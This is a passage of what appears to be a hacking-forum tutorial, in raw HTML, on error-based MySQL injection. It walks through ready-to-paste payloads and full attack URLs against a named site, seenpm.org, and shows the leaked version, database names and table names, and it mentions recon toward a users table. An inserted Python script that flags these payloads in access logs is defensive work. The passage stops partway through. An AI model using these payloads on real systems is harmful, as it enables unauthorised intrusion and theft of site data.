<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: x-small; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;">NOTE: Make sure to organize the query if you're just gonna copy and paste!<br style="margin: 0px; padding: 0px;" />There could be some spaces in between</span></span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;">Getting the version of their database (2 main ways to do it):</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">First way:</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL will look like:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Second way:</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL will look like:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot: </span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_header" style="margin: 0px; padding: 0px;">
Spoiler</div>
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: lOnau.png]" border="0" height="181" src="http://i.imgur.com/lOnau.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="320" /></div>
</div>
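<br /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Added example, not part of the original tutorial: the request and the response of this technique both carry distinctive signatures, so a defender can flag them in web-server access logs and in what the application sends back. The log lines, the response text and the IP addresses below are constructed for the demo; only the payload shape comes from the tutorial.</span><br />

```python
"""Added example (not from the tutorial): flag double-query / error-based
SQL injection attempts in web-server access logs, and detect the leaked
MySQL 'Duplicate entry' error in application responses.
All log lines and response bodies below are constructed for the demo."""
import re
from typing import Iterable, Iterator, List, Optional, Tuple
from urllib.parse import unquote_plus

# Request-side signatures of the FLOOR(RAND(0)*2) ... GROUP BY technique.
# Matching runs on URL-decoded, whitespace-collapsed text, so '+' and %20
# variants of the same query all look alike. This is a signature check,
# not a SQL parser: comment-based spacing (/**/) is not normalised here.
REQUEST_SIGNATURES = {
    "rand_floor_group_by": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "group_by_concat": re.compile(r"group\s+by\s+concat\s*\(", re.I),
    "information_schema": re.compile(
        r"information_schema\s*\.\s*(tables|schemata|columns)", re.I),
    "derived_count_star": re.compile(
        r"select\s+count\s*\(\s*\*\s*\)\s+from\s*\(\s*select", re.I),
}

# Response-side signature: MySQL's duplicate-key error, which is the channel
# the tutorial reads the extracted value from.
LEAK_PATTERN = re.compile(
    r"Duplicate entry '(?P<leaked>[^']*)' for key '(?P<key>[^']+)'")

# Combined-log format: only the request target between the quotes is needed.
LOG_REQUEST = re.compile(r'"(?:GET|POST)\s+(?P<target>\S+)\s+HTTP/[\d.]+"')


def normalise(target: str) -> str:
    """URL-decode ('+' and %20 become spaces) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(target))


def classify_request(target: str) -> List[str]:
    """Names of the double-query signatures present in a request target;
    an empty list means nothing suspicious was seen."""
    text = normalise(target)
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(text)]


def scan_access_log(lines: Iterable[str]) -> Iterator[Tuple[str, List[str]]]:
    """Yield (request_target, matched_signatures) for every suspicious line."""
    for line in lines:
        m = LOG_REQUEST.search(line)
        if m:
            hits = classify_request(m.group("target"))
            if hits:
                yield m.group("target"), hits


def extract_leak(response_body: str) -> Optional[str]:
    """Return the value that escaped through a duplicate-key error, or None.
    The last character is the 0/1 produced by FLOOR(RAND(0)*2), so it is
    dropped; with the tutorial's concat_ws(0x7e, ...) wrapper the real value
    then sits between '~' characters."""
    m = LEAK_PATTERN.search(response_body)
    if not m:
        return None
    return m.group("leaked")[:-1]


# Constructed sample data (documentation-range IPs). The second line carries
# the payload shape shown in the tutorial, URL-encoded as a browser sends it.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Sep/2013:23:06:00 -0700] "GET /new/index.php?id=151 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [04/Sep/2013:23:06:09 -0700] "GET /new/index.php?id=151+and+(select+1+from+'
    '(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+'
    'concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),'
    'floor(rand(0)*2)))a)--+x HTTP/1.1" 500 812',
    '198.51.100.7 - - [04/Sep/2013:23:07:41 -0700] "GET /new/index.php?id=152&sort=name HTTP/1.1" 200 5098',
]
SAMPLE_RESPONSE = ("<b>Warning</b>: query failed: "
                   "Duplicate entry '~5.5.30-constructed~1' for key 'group_key'")

if __name__ == "__main__":
    for target, hits in scan_access_log(SAMPLE_LOG):
        print("suspicious request:", target[:60], "...", hits)
    print("value leaked through error:", extract_leak(SAMPLE_RESPONSE))
```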
<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: underline;"><span style="margin: 0px; padding: 0px;"><span style="font-weight: bold; margin: 0px; padding: 0px;">Now that we've got the version, let's extract the database:</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query used:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL will look like this:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Note: notice the ending </span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">limit+0,1),1,150)</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">This is the part where I raised the ascii from 25 to 150, just in case there were more databases.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">I'll explain more about the mid() function in the next step.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot:</span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_header" style="margin: 0px; padding: 0px;">
Spoiler</div>
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: QxgVN.png]" border="0" height="440" src="http://i.imgur.com/QxgVN.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="640" /></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">We have the database and version so far</span><br />
<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;">Now for the tables in their current database</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">'links,members,menu,menu_s1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Now read this carefully: notice that the tables aren't completely shown.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Only about half of them are shown. This is because of the mid() function we're using.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; font-style: italic; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;">Leave the limit 0,1 clause alone and don't touch it</span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">What you need to alter now are the integers of the mid() function,</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">i.e. (mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">1,25</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">)</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Yes, that's right. Notice 1,25.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">25 can also be altered; however, it's a moderate value, so leave it like that.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Now, the number "</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">1</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">" is the starting position: as soon as it's altered, a different part of the table list is shown.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Incrementing it is what's needed here.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Let's just say </span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">15,25</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">It'll display the rest of the tables.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">I've done a bit of recon on the site and found out that the '</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">users</span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">' table is located at </span><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">58,25</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; 